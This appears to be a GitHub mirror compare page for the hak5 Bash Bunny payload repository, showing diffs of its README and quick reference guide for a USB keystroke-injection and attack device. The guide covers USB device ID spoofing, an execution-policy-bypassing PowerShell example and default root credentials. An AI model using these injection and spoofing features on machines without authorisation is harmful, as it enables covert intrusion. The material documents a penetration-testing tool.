mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Compare commits
186 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
2bba8664e7 | ||
|
|
f582f57a34 | ||
|
|
f3cb607e0e | ||
|
|
53aaa4d1c0 | ||
|
|
342a2299c4 | ||
|
|
e3c4e45e29 | ||
|
|
20ca26ee74 | ||
|
|
3b368fe23e | ||
|
|
1839f3e760 | ||
|
|
4ecfbf665e | ||
|
|
f214a3adf9 | ||
|
|
83e5702639 | ||
|
|
b2731e7e97 | ||
|
|
937ecc7e8b | ||
|
|
5b14682936 | ||
|
|
f451511363 | ||
|
|
d92eef0e32 | ||
|
|
6295445794 | ||
|
|
377a5bc7b4 | ||
|
|
a764a9e238 | ||
|
|
5e1dbdb489 | ||
|
|
17ef1c0099 | ||
|
|
37de2446e3 | ||
|
|
759b114db9 | ||
|
|
1e1e9cfcb1 | ||
|
|
faf0c7411e | ||
|
|
c2d79df555 | ||
|
|
67527e8ce0 | ||
|
|
39b0d2887a | ||
|
|
37d8415e0e | ||
|
|
1b4af72c46 | ||
|
|
98b9d9fc37 | ||
|
|
2f18d8a328 | ||
|
|
5fc5a3b0b5 | ||
|
|
2dbb38e372 | ||
|
|
02f90b6b46 | ||
|
|
8947bcfb8e | ||
|
|
125a5fff62 | ||
|
|
e86e64c21c | ||
|
|
49b157156d | ||
|
|
dfdc89f773 | ||
|
|
91bea999f6 | ||
|
|
f9e73fb7c1 | ||
|
|
5268568869 | ||
|
|
8047cb218a | ||
|
|
db87d0dc02 | ||
|
|
e2f848c6b0 | ||
|
|
81317d83b1 | ||
|
|
066b7846da | ||
|
|
938fe29c94 | ||
|
|
e82fb6166b | ||
|
|
f9aadb0a4d | ||
|
|
00b2ea8aa9 | ||
|
|
0b9f7c0b47 | ||
|
|
b6af89dbdc | ||
|
|
2f23f34e6a | ||
|
|
d3727bd899 | ||
|
|
dabde35526 | ||
|
|
516df5d36c | ||
|
|
8a9437ae6e | ||
|
|
aec718806e | ||
|
|
8dd4797e5d | ||
|
|
36e34feac4 | ||
|
|
dba779b304 | ||
|
|
c282540f52 | ||
|
|
f171837db2 | ||
|
|
ca22f20b53 | ||
|
|
d22c2481a0 | ||
|
|
63c62a4871 | ||
|
|
81b4e060c8 | ||
|
|
a9b191045b | ||
|
|
bed7de2cd4 | ||
|
|
f573cb9b0b | ||
|
|
cda2430080 | ||
|
|
6760498c27 | ||
|
|
7c8fbf0f41 | ||
|
|
502576d7ed | ||
|
|
b1309229cc | ||
|
|
d341068548 | ||
|
|
55c7d4f706 | ||
|
|
0ee25f8d0d | ||
|
|
0273c87be2 | ||
|
|
fed24a87b4 | ||
|
|
9777ae0fee | ||
|
|
9687a8d830 | ||
|
|
d386f07d8e | ||
|
|
820576a103 | ||
|
|
e61d58d488 | ||
|
|
e0c355da0a | ||
|
|
e527ab16a5 | ||
|
|
aac697e89a | ||
|
|
ae176d1d14 | ||
|
|
33b71367c4 | ||
|
|
ee48a74dc6 | ||
|
|
9fab25740d | ||
|
|
be78dafbfc | ||
|
|
989be5976a | ||
|
|
e984278d66 | ||
|
|
33ba79d692 | ||
|
|
65d652a15c | ||
|
|
032061688d | ||
|
|
4df763c4a4 | ||
|
|
38a7460fe6 | ||
|
|
5f31a0be02 | ||
|
|
9011db7fae | ||
|
|
6345354375 | ||
|
|
65ad5f6e89 | ||
|
|
920ff7fa67 | ||
|
|
81e6d536dd | ||
|
|
b37aed0edc | ||
|
|
7f902403d4 | ||
|
|
a998f5c86c | ||
|
|
b644446f40 | ||
|
|
940dc09043 | ||
|
|
650772e9e4 | ||
|
|
d978800874 | ||
|
|
f8a442e66d | ||
|
|
6fa5887aae | ||
|
|
fae8746466 | ||
|
|
08c24c4389 | ||
|
|
53cf608b7f | ||
|
|
a48d9e2a61 | ||
|
|
00cee07ec0 | ||
|
|
e0abae7179 | ||
|
|
3a1b26e9c4 | ||
|
|
7097f442d3 | ||
|
|
dbae32c86d | ||
|
|
69cd48ee05 | ||
|
|
d65380bd94 | ||
|
|
f97b75983d | ||
|
|
2c49f6c09b | ||
|
|
98f6231faa | ||
|
|
fc0b43a403 | ||
|
|
f8c2edc325 | ||
|
|
e866ad438b | ||
|
|
763639b305 | ||
|
|
060d5744b0 | ||
|
|
c58e10dcab | ||
|
|
b894aa5842 | ||
|
|
5a77792c1d | ||
|
|
91c7c2276f | ||
|
|
c0ab8d3e88 | ||
|
|
01dd281e4f | ||
|
|
ddcd785deb | ||
|
|
cb706bcacc | ||
|
|
b82ccd12b1 | ||
|
|
61793e6f0b | ||
|
|
761dd0e433 | ||
|
|
3c2dd4ac1e | ||
|
|
c8b892badb | ||
|
|
6a9134d84b | ||
|
|
691f7e5bc9 | ||
|
|
113e35c736 | ||
|
|
80d622e16e | ||
|
|
0f83db10f5 | ||
|
|
fd0a0d0f6f | ||
|
|
a487d0a5db | ||
|
|
9c527c29c4 | ||
|
|
9eed215260 | ||
|
|
941180d59a | ||
|
|
bf063c1219 | ||
|
|
6ea0d43662 | ||
|
|
4dbc20f972 | ||
|
|
dd2013ef9d | ||
|
|
7f44c67c17 | ||
|
|
9fe8bddb49 | ||
|
|
c0743ccd31 | ||
|
|
2ee6e16a2f | ||
|
|
b22dd031b8 | ||
|
|
abfea1f683 | ||
|
|
8cad8b4e2a | ||
|
|
ea483975fd | ||
|
|
c10a388f8c | ||
|
|
f7c7c55f26 | ||
|
|
92efc2e097 | ||
|
|
cc537b1622 | ||
|
|
c8447375ea | ||
|
|
a1471e3a76 | ||
|
|
7368fc9b19 | ||
|
|
84f07261ba | ||
|
|
0635da0933 | ||
|
|
ef456ab581 | ||
|
|
92e2ed509f | ||
|
|
2c21fa6248 | ||
|
|
ac1c6020f9 | ||
|
|
f8614a3c1a |
@@ -1,8 +1,9 @@
|
||||
# Payload Library for the Bash Bunny by Hak5
|
||||
|
||||

|
||||

|
||||
|
||||
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
|
||||
* [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
|
||||
* [Documentation and Wiki](https://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
|
||||
* [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums")
|
||||
* IRC: irc.hak5.org #BashBunny
|
||||
* Discord: https://discord.gg/WuteWPf
|
||||
|
||||
@@ -1,3 +1,3 @@
|
||||
#!/bin/bash
|
||||
#This configuration file is used to set default variables
|
||||
DUCKY_LANG us
|
||||
DUCKY_LANG us
|
||||
|
||||
612
docs/readme.txt
612
docs/readme.txt
@@ -1,278 +1,334 @@
|
||||
|
||||
_____ _____ _____ _____ _____ _____ _____ _____ __ __
|
||||
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
|
||||
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
|
||||
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
|
||||
-+- QUICK REFERENCE GUIDE v1.3 -+-
|
||||
|
||||
|
||||
+-----------------+
|
||||
+---- | The Bash Bunny by Hak5 is a simple and powerful
|
||||
| : | Boot Modes | multi-function USB attack and automation platform
|
||||
+---- * | for penetration testers and systems administrators.
|
||||
+--|||------------+
|
||||
|||
|
||||
||+-- (sw1) Switch Position 1: Customizeable Payload.
|
||||
|+-- (sw2) Switch Position 2: Customizeable Payload.
|
||||
+-- (sw3) Switch Position 3: Arming Mode - Serial + Mass Storage.
|
||||
|
||||
|
||||
|
||||
Welcome & Updating the Bash Bunny Software
|
||||
------------------------------------------------------------------------------
|
||||
Congratulations on your new Bash Bunny by Hak5! For the best experience, we
|
||||
recommend updating to the latest framework version and payload set from the
|
||||
downloads section of https://www.bashbunny.com. There you will find a wealth
|
||||
of knowledge and a helpful community of creative penetration testers and
|
||||
IT professionals. Welcome!
|
||||
|
||||
|
||||
|
||||
Mass-Storage Directory Structure Default Settings
|
||||
-------------------------------------------- -----------------------------
|
||||
.
|
||||
|-payloads/ Username: root
|
||||
| |-library/ Password: hak5bunny
|
||||
| | |-* Payloads from Bash Bunny repository
|
||||
| | |-extensions/ - Additional Bunny Script Hostname: bunny
|
||||
| | commands/functions.
|
||||
| |-switch1/ IP Address: 172.16.64.1
|
||||
| | |-payload.txt - Bunny Script executed on DHCP Range: 172.16.64.10-12
|
||||
| | boot in switch position 1
|
||||
| |-switch2/ LED Status:
|
||||
| |-payload.txt - Bunny Script executed on Green Solid - Boot up
|
||||
| boot in switch position 2 Blue Blink - Arming Mode
|
||||
|-loot/ - Where payloads store logs and data Red/Blue Blink - Recovery
|
||||
|-docs/ - EULA, License, this readme.txt
|
||||
|-tools/ - Contents placed here will be copied
|
||||
| to /tools at boot in arming mode.
|
||||
| *.deb packages will be installed.
|
||||
|-languages/ - HID languages placed here will
|
||||
install at boot in arming mode.
|
||||
|
||||
|
||||
|
||||
Partitions Recovery
|
||||
-------------------------------------- -------------------------------------
|
||||
/dev/root - Main Linux file system If the Bash Bunny Setup Mode fails to
|
||||
/dev/nandg - Recovery file systems boot >3 times the file system will
|
||||
do not modify recover automatically. DO NOT UNPLUG
|
||||
/dev/nandf - Mass storage partition while the LED is blinking in an
|
||||
Mounted at /root/udisk alternating Red/Blue pattern. This
|
||||
/root/udisk - Mass storage mount point process requires 5-10 minutes.
|
||||
|
||||
|
||||
|
||||
Bunny Script Builtin Commands Ducky Script
|
||||
----------------------------------------------------------- ---------------
|
||||
ATTACKMODE Specifies the USB devices to emulate. REM
|
||||
Accepts combinations of three: SERIAL, DELAY
|
||||
ECM_ETHERNET, RNDIS_ETHERNET, STORAGE, HID STRING
|
||||
WINDOWS/GUI
|
||||
LED Control the RGB LED. Accepts color and pattern MENU/APP
|
||||
or predefined payload state. SHIFT
|
||||
See detail from LED section. ALT
|
||||
CONTROL/CTRL
|
||||
QUACK Injects specified keystrokes via Ducky Script UPARROW/UP
|
||||
Accepts file relative to /payloads/ path DOWNARROW/DOWN
|
||||
Accepts inline Ducky Script LEFTARROW/LEFT
|
||||
RIGHTARROW/RIGHT
|
||||
Q Alias for QUACK PAUSE/BREAK
|
||||
DELETE
|
||||
Example: END
|
||||
QUACK helloworld.txt Inject keystrokes from file ESCAPE/ESC
|
||||
Q STRING Hello World Inject keystrokes from Ducky Script HOME
|
||||
INSERT
|
||||
DUCKY_LANG=us Sets keystroke injection language PAGEUP P
|
||||
PAGEDOWN
|
||||
PRINTSCREEN
|
||||
SPACE
|
||||
Bunny Script Environment Variables TAB
|
||||
---------------------------------------------------------- NUMLOCK
|
||||
$TARGET_IP IP Address of the computer received SCROLLOCK
|
||||
by the Bash Bunny DHCP Server. CAPSLOCK
|
||||
$TARGET_HOSTNAME Host name of the computer on the F1...F12
|
||||
Bash Bunny network.
|
||||
$HOST_IP IP Address of the Bash Bunny
|
||||
(Default: 172.16.64.1)
|
||||
$SWITCH_POSITION "switch1", "switch2" or "switch3"
|
||||
|
||||
|
||||
|
||||
Bash Bunny Extensions
|
||||
-----------------------------------------------------------------------------
|
||||
The Bash Bunny scripting language is further enhanced by additional commands,
|
||||
known as extensions. Sourced from payloads/library/extensions/* at run-time,
|
||||
payloads may make use of these command. Similar to payloads, the extensions
|
||||
can be obtain and updated from the Bash Bunny repository.
|
||||
|
||||
Example extension: RUN - Simplifies command execution for HID attacks.
|
||||
Usage: RUN [OS] [Command]
|
||||
RUN WIN notepad.exe
|
||||
RUN WIN "powershell -Exec Bypass \"tree c:\\ > tree.txt; type tree.txt\"
|
||||
RUN OSX http://www.example.com
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Windows Serial Settings
|
||||
--------------------------------------------------------- ---------------
|
||||
Find the COM# from Device Manager > Ports (COM & LPT) 115200/8N1
|
||||
Look for USB Serial Device (COM#). Example: COM3
|
||||
Or run the following powershell command to list ports: Baud: 115200
|
||||
[System.IO.Ports.SerialPort]::getportnames() Data Bits: 8
|
||||
Parity Bit: No
|
||||
Open Putty (putty.org) and select Serial. Enter COM# for Stop Bit: 1
|
||||
serial line and 115200 for Speed. Clock Open.
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Linux/Mac
|
||||
-----------------------------------------------------------------------------
|
||||
Find the device from the terminal with: "ls /dev/tty*" or "dmesg | grep tty"
|
||||
On Linux the Bash Bunny may be /dev/ttyUSB0 or /dev/ttyACM0
|
||||
Connect to the serial device with screen. (apt-get install screen if needed)
|
||||
Example: "sudo screen /dev/ttyACM0 115200"
|
||||
Disconnect with keyboard combo: CTRL+a followed by CTRL+\
|
||||
|
||||
|
||||
|
||||
Example Payload Structure
|
||||
-------------------------
|
||||
payloads/switch#/
|
||||
|-payload.txt Primary payload file executed on boot in
|
||||
| specified switch position
|
||||
|-readme.txt Optional payload documentation
|
||||
|-config.txt Optional payload configuration for variables
|
||||
| sourced by complex payloads
|
||||
|-install.sh Installation script for complex payloads
|
||||
| requiring initial setup (may require Internet)
|
||||
|-remove.sh Uninstall/Cleanup script for complex payloads
|
||||
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Windows
|
||||
-----------------------------------------------------------------------------
|
||||
- Configure a payload.txt for ATTACKMODE RNDIS_ETHERNET
|
||||
- Boot Bash Bunny from RNDIS_ETHERNET set payload on the host Windows PC
|
||||
- Open Control Panel > Network Connections (Start > Run > "ncpa.cpl" > Enter)
|
||||
- Identify Bash Bunny interface. Device name: "USB Ethernet/RNDIS Gadget"
|
||||
- Right-click Internet interface (e.g. Wi-Fi) and click Properties.
|
||||
- From the Sharing tab, check "Allow other network users to connect through
|
||||
this computer's Internet connection", select the Bash Bunny from the
|
||||
Home networking connection list (e.g. Ethernet 2) and click OK.
|
||||
- Right-click Bash Bunny interface (e.g. Ethenet 2) and click Properties.
|
||||
- Select TCP/IPv4 and click Properties.
|
||||
- Set the IP address to 172.16.64.64. Leave Subnet mask as 255.255.255.0 and
|
||||
click OK on both properties windows. Internet Connection Sharing is complete
|
||||
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Linux
|
||||
-----------------------------------------------------------------------------
|
||||
- Download the Internet Connection Sharing script from bashbunny.com/bb.sh
|
||||
e.g: wget bashbunny.com/bb.sh
|
||||
- Run the bb.sh connection script with bash as root
|
||||
e.g: sudo bash ./bb.sh
|
||||
- Follow the [M]anual or [G]uided setup to configure iptables and routing
|
||||
- Save settings for future sessions and [C]onnect
|
||||
|
||||
|
||||
|
||||
ATTACKMODE Command
|
||||
-----------------------------------------------------------------------------
|
||||
ATTACKMODE sets the device emulation parameters for the Bash Bunny.
|
||||
Three of five attack modes may be executed simultaneously.
|
||||
|
||||
Parameter Type Target/Use
|
||||
-------------- ------------------------------------ -------------------
|
||||
SERIAL ACM Abstract Control Model Serial Console
|
||||
ECM_ETHERNET ECM Ethernet Control Model Linux/Mac/Android
|
||||
RNDIS_ETHERNET RNDIS Remote Network Dvr Int Spec Windows (some *nix)
|
||||
STORAGE UMS USB Mass Storage Flash Drive
|
||||
HID HID Human Interface Device Keystroke Injection
|
||||
|
||||
|
||||
|
||||
LED Command
|
||||
-----------------------------------------------------------------------------
|
||||
The multi-color LED enables at-a-glance information on payload status.
|
||||
The LED is controlled via the LED command, from the console or payload.txt
|
||||
|
||||
Usage: LED [COLOR] [PATTERN] or LED [STATE]
|
||||
|
||||
COLORS
|
||||
------
|
||||
In addition to Red, Green and Blue, additive color mixing is possible.
|
||||
|
||||
-------- --------------------------------------------
|
||||
R Red
|
||||
G Green
|
||||
B Blue
|
||||
Y, R G Yellow (Commonly known as Amber)
|
||||
C, G B Cyan (Commonly known as Light Blue)
|
||||
M, R B Magenta (Commonly known as Violet or Purple)
|
||||
W, R G B White (Combination of R + G + B)
|
||||
|
||||
PATTERNS
|
||||
-------- --------------------------------------------------------
|
||||
SOLID *Default. No blink. Used if pattern argument is ommitted
|
||||
|
||||
SLOW Symmetric 1000ms ON, 1000ms OFF, repeating
|
||||
FAST Symmetric 100ms ON, 100ms OFF, repeating
|
||||
VERYFAST Symmetric 10ms ON, 10ms OFF, repeating
|
||||
|
||||
SINGLE 1 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
DOUBLE 2 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
TRIPLE 3 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUAD 4 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUIN 5 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
|
||||
ISINGLE 1 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IDOUBLE 2 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
ITRIPLE 3 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUAD 4 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUIN 5 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
|
||||
SUCCESS 1000ms VERYFAST blink followed by SOLID
|
||||
# Custom value in ms for continuous symmetric blinking
|
||||
|
||||
STATES
|
||||
---------------------------------------------------------------------
|
||||
In addition to the combinations of COLORS and PATTERNS listed above,
|
||||
these standardized LED STATES may be used to indicate payload status:
|
||||
|
||||
---------- ------------- ---------------------------------------------
|
||||
SETUP M SOLID Magenta solid
|
||||
|
||||
FAIL R SLOW Red slow blink
|
||||
FAIL1 R SLOW Red slow blink
|
||||
FAIL2 R FAST Red fast blink
|
||||
FAIL3 R VERYFAST Red very fast blink
|
||||
|
||||
ATTACK Y SINGLE Yellow single blink
|
||||
STAGE1 Y SINGLE Yellow single blink
|
||||
STAGE2 Y DOUBLE Yellow double blink
|
||||
STAGE3 Y TRIPLE Yellow triple blink
|
||||
STAGE4 Y QUAD Yellow quadruple blink
|
||||
STAGE5 Y QUIN Yellow quintuple blink
|
||||
|
||||
SPECIAL C ISINGLE Cyan inverted single blink
|
||||
SPECIAL1 C ISINGLE Cyan inverted single blink
|
||||
SPECIAL2 C IDOUBLE Cyan inverted double blink
|
||||
SPECIAL3 C ITRIPLE Cyan inverted triple blink
|
||||
SPECIAL4 C IQUAD Cyan inverted quadriple blink
|
||||
SPECIAL5 C IQUIN Cyan inverted quintuple blink
|
||||
|
||||
CLEANUP W FAST White fast blink
|
||||
FINISH G SUCCESS Green 1000ms VERYFAST blink followed by SOLID
|
||||
|
||||
OFF Turns the LED off
|
||||
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
(\___/) Find further documentation, repository of payloads, (\___/)
|
||||
(='.'=) tutorial videos and community support forums at (='.'=)
|
||||
(")_(") bashbunny.com. (C) Hak5 LLC (")_(")
|
||||
|
||||
_____ _____ _____ _____ _____ _____ _____ _____ __ __
|
||||
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
|
||||
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
|
||||
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
|
||||
-+- QUICK REFERENCE GUIDE v1.4 -+-
|
||||
|
||||
|
||||
+-----------------+
|
||||
+---- | The Bash Bunny by Hak5 is a simple and powerful
|
||||
| : | Boot Modes | multi-function USB attack and automation platform
|
||||
+---- * | for penetration testers and systems administrators.
|
||||
+--|||------------+
|
||||
|||
|
||||
||+-- (sw1) Switch Position 1: Customizeable Payload.
|
||||
|+-- (sw2) Switch Position 2: Customizeable Payload.
|
||||
+-- (sw3) Switch Position 3: Arming Mode - Serial + Mass Storage.
|
||||
|
||||
|
||||
|
||||
Welcome & Updating the Bash Bunny Software
|
||||
------------------------------------------------------------------------------
|
||||
Congratulations on your new Bash Bunny by Hak5! For the best experience, we
|
||||
recommend updating to the latest framework version and payload set from the
|
||||
downloads section of https://www.bashbunny.com. There you will find a wealth
|
||||
of knowledge and a helpful community of creative penetration testers and
|
||||
IT professionals. Welcome!
|
||||
|
||||
|
||||
|
||||
Mass-Storage Directory Structure Default Settings
|
||||
-------------------------------------------- -----------------------------
|
||||
.
|
||||
|-config.txt - Global config script Username: root
|
||||
| Sourced by all payloads Password: hak5bunny
|
||||
|-payloads/ Hostname: bunny
|
||||
| |-library/
|
||||
| | |-* Payloads from Bash Bunny repository IP Address: 172.16.64.1
|
||||
| | DHCP Range: 172.16.64.10-12
|
||||
| |-extensions/ - Additional Bunny Script
|
||||
| | commands/functions. LED Status:
|
||||
| |-switch1/ Green Solid - Boot up
|
||||
| | |-payload.txt - Bunny Script executed on Blue Blink - Arming Mode
|
||||
| | boot in switch position 1 Red/Blue Blink - Recovery
|
||||
| |-switch2/
|
||||
| | |-payload.txt - Bunny Script executed on
|
||||
| | boot in switch position 2
|
||||
| |-arming/
|
||||
| |-payload.txt - Override payload for
|
||||
| Arming Mode *USE CAUTION*
|
||||
|
|
||||
|-loot/ - Where payloads store logs and data
|
||||
|-docs/ - EULA, License, this readme.txt
|
||||
|-tools/ - Contents placed here will be copied
|
||||
| to /tools at boot in arming mode.
|
||||
| *.deb packages will be installed.
|
||||
|-languages/ - HID languages placed here will
|
||||
install at boot in arming mode.
|
||||
|
||||
|
||||
|
||||
Partitions Recovery
|
||||
-------------------------------------- -------------------------------------
|
||||
/dev/root - Main Linux file system If the Bash Bunny Setup Mode fails to
|
||||
/dev/nandg - Recovery file systems boot >3 times the file system will
|
||||
do not modify recover automatically. DO NOT UNPLUG
|
||||
/dev/nandf - Mass storage partition while the LED is blinking in an
|
||||
Mounted at /root/udisk alternating Red/Blue pattern. This
|
||||
/root/udisk - Mass storage mount point process requires 5-10 minutes.
|
||||
|
||||
|
||||
|
||||
Bunny Script Builtin Commands Ducky Script
|
||||
----------------------------------------------------------- ---------------
|
||||
ATTACKMODE Specifies the USB devices to emulate. REM
|
||||
Accepts combinations of three: SERIAL, DELAY
|
||||
ECM_ETHERNET, RNDIS_ETHERNET, STORAGE, HID, STRING
|
||||
RO_STORAGE or disable all USB with OFF SPACE
|
||||
WINDOWS/GUI
|
||||
LED Control the RGB LED. Accepts color and pattern MENU/APP
|
||||
or predefined payload state. SHIFT
|
||||
See detail from LED section. ALT
|
||||
CONTROL/CTRL
|
||||
QUACK Injects specified keystrokes via Ducky Script UPARROW/UP
|
||||
Accepts file relative to /payloads/ path DOWNARROW/DOWN
|
||||
Accepts inline Ducky Script LEFTARROW/LEFT
|
||||
RIGHTARROW/RIGHT
|
||||
Q Alias for QUACK PAUSE/BREAK
|
||||
DELETE
|
||||
Example: END
|
||||
QUACK helloworld.txt Inject keystrokes from file ESCAPE/ESC
|
||||
Q STRING Hello World Inject keystrokes from Ducky Script HOME
|
||||
INSERT
|
||||
DUCKY_LANG=us Sets keystroke injection language PAGEUP P
|
||||
PAGEDOWN
|
||||
PRINTSCREEN
|
||||
SPACE
|
||||
Bunny Script Environment Variables TAB
|
||||
---------------------------------------------------------- NUMLOCK
|
||||
$TARGET_IP IP Address of the computer received SCROLLOCK
|
||||
by the Bash Bunny DHCP Server. CAPSLOCK
|
||||
$TARGET_HOSTNAME Host name of the computer on the F1...F12
|
||||
Bash Bunny network.
|
||||
$HOST_IP IP Address of the Bash Bunny
|
||||
(Default: 172.16.64.1)
|
||||
$SWITCH_POSITION "switch1", "switch2" or "switch3"
|
||||
|
||||
|
||||
|
||||
Bash Bunny Extensions
|
||||
-----------------------------------------------------------------------------
|
||||
The Bash Bunny scripting language is further enhanced by additional commands,
|
||||
known as extensions. Sourced from payloads/library/extensions/* at run-time,
|
||||
payloads may make use of these command. Similar to payloads, the extensions
|
||||
can be obtain and updated from the Bash Bunny repository.
|
||||
|
||||
RUN - Simplifies command execution for HID attacks.
|
||||
Usage: RUN [OS] [Command]
|
||||
RUN WIN notepad.exe
|
||||
RUN WIN "powershell -Exec Bypass \"tree c:\\ > tree.txt; type tree.txt\"
|
||||
RUN OSX http://www.example.com
|
||||
|
||||
|
||||
CUCUMBER - CPU Control (May be specified globally in /config.txt)
|
||||
Usage: CUCUMBER [Mode]
|
||||
CUCUMBER ENABLE Single CPU core mode with governor set to ondemand
|
||||
*Best thermal option for long-term deployments
|
||||
CUCUMBER DISABLE Quad CPU core mode with governor set to ondemand
|
||||
*Default behavior. Best overall power/performance
|
||||
CUCUMBER PLAID Quad CPU core mode with governor set to performance
|
||||
*Ludicrous speed. Not intended for long-term deployments.
|
||||
|
||||
|
||||
DUCKY_LANG - Specifies HID injection language for QUACK commands
|
||||
Usage: DUCKY_LANG [Language]
|
||||
DUCKY_LANG us
|
||||
* Specified in two letter language abbreviation
|
||||
* Uses language json file from langauge database (updated via /languages)
|
||||
|
||||
|
||||
REQUIRETOOL - Checks if a tool is installed. Exits with LED FAIL if not.
|
||||
Usage: REQUIRETOOL [tool]
|
||||
REQUIRETOOL impacket
|
||||
* Checks /tools/ for named directory or system installed tool name
|
||||
|
||||
|
||||
GET - Returns variable
|
||||
Usage: GET [variable]
|
||||
GET TARGET_IP Returns $TARGET_IP
|
||||
GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME
|
||||
GET HOST_IP Returns $HOST_IP
|
||||
GET SWITCH_POSITION Returns $SWITCH_POSITION
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Windows Serial Settings
|
||||
--------------------------------------------------------- ---------------
|
||||
Find the COM# from Device Manager > Ports (COM & LPT) 115200/8N1
|
||||
Look for USB Serial Device (COM#). Example: COM3
|
||||
Or run the following powershell command to list ports: Baud: 115200
|
||||
[System.IO.Ports.SerialPort]::getportnames() Data Bits: 8
|
||||
Parity Bit: No
|
||||
Open Putty (putty.org) and select Serial. Enter COM# for Stop Bit: 1
|
||||
serial line and 115200 for Speed. Clock Open.
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Linux/Mac
|
||||
-----------------------------------------------------------------------------
|
||||
Find the device from the terminal with: "ls /dev/tty*" or "dmesg | grep tty"
|
||||
On Linux the Bash Bunny may be /dev/ttyUSB0 or /dev/ttyACM0
|
||||
Connect to the serial device with screen. (apt-get install screen if needed)
|
||||
Example: "sudo screen /dev/ttyACM0 115200"
|
||||
Disconnect with keyboard combo: CTRL+a followed by CTRL+\
|
||||
|
||||
|
||||
|
||||
Example Payload Structure
|
||||
-------------------------
|
||||
/config.txt - Sourced by all payloads enabling global configurations
|
||||
Example: DUCKY_LANG us
|
||||
/payloads/switch#/
|
||||
|-payload.txt Primary payload file executed on boot in
|
||||
| specified switch position
|
||||
|-readme.md Payload documentation in markdown for github
|
||||
|-install.sh Installation script for complex payloads
|
||||
requiring initial setup (may require Internet)
|
||||
/payloads/arming/
|
||||
|-payload.txt Special payload executed when switch is in
|
||||
position 3 (arming mode). Overrides default
|
||||
STORAGE+SERIAL mode. For advanced users only.
|
||||
WARNING: Be careful not to lock yourself out
|
||||
of the Bash Bunny by disabling access via
|
||||
STORAGE or SERIAL when using this feature.
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Windows
|
||||
-----------------------------------------------------------------------------
|
||||
- Configure a payload.txt for ATTACKMODE RNDIS_ETHERNET
|
||||
- Boot Bash Bunny from RNDIS_ETHERNET set payload on the host Windows PC
|
||||
- Open Control Panel > Network Connections (Start > Run > "ncpa.cpl" > Enter)
|
||||
- Identify Bash Bunny interface. Device name: "USB Ethernet/RNDIS Gadget"
|
||||
- Right-click Internet interface (e.g. Wi-Fi) and click Properties.
|
||||
- From the Sharing tab, check "Allow other network users to connect through
|
||||
this computer's Internet connection", select the Bash Bunny from the
|
||||
Home networking connection list (e.g. Ethernet 2) and click OK.
|
||||
- Right-click Bash Bunny interface (e.g. Ethenet 2) and click Properties.
|
||||
- Select TCP/IPv4 and click Properties.
|
||||
- Set the IP address to 172.16.64.64. Leave Subnet mask as 255.255.255.0 and
|
||||
click OK on both properties windows. Internet Connection Sharing is complete
|
||||
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Linux
|
||||
-----------------------------------------------------------------------------
|
||||
- Download the Internet Connection Sharing script from bashbunny.com/bb.sh
|
||||
e.g: wget bashbunny.com/bb.sh
|
||||
- Run the bb.sh connection script with bash as root
|
||||
e.g: sudo bash ./bb.sh
|
||||
- Follow the [M]anual or [G]uided setup to configure iptables and routing
|
||||
- Save settings for future sessions and [C]onnect
|
||||
|
||||
|
||||
|
||||
ATTACKMODE Command
|
||||
-----------------------------------------------------------------------------
|
||||
ATTACKMODE sets the device emulation parameters for the Bash Bunny.
|
||||
Three attack modes may be executed simultaneously.
|
||||
|
||||
Parameter Type Target/Use
|
||||
-------------- ------------------------------------ ------------------------
|
||||
SERIAL ACM Abstract Control Model Serial Console
|
||||
ECM_ETHERNET ECM Ethernet Control Model Linux/Mac/Android
|
||||
RNDIS_ETHERNET RNDIS Remote Network Dvr Int Spec Windows (some *nix)
|
||||
STORAGE UMS USB Mass Storage Flash Drive
|
||||
RO_STORAGE UMS USB Mass Storage Read-Only Flash Drive
|
||||
HID HID Human Interface Device Keystroke Injection
|
||||
|
||||
ATTACKMODE Advanced Parameters
|
||||
------------- ----------------------------------------------------------------
|
||||
PID_ Specifies the USB device product ID
|
||||
VID_ Specifies the USB device vendor ID
|
||||
MAN_ Specifies the USB device manufacturer
|
||||
SN_ Specifies the USB device serial number
|
||||
OFF Disables all USB emulaiton
|
||||
|
||||
Example:
|
||||
ATTACKMODE HID STORAGE VID_0XF000 PID_0X1234 SN_12345678 MAN_HAK5
|
||||
|
||||
|
||||
|
||||
LED Command
|
||||
-----------------------------------------------------------------------------
|
||||
The multi-color LED enables at-a-glance information on payload status.
|
||||
The LED is controlled via the LED command, from the console or payload.txt
|
||||
|
||||
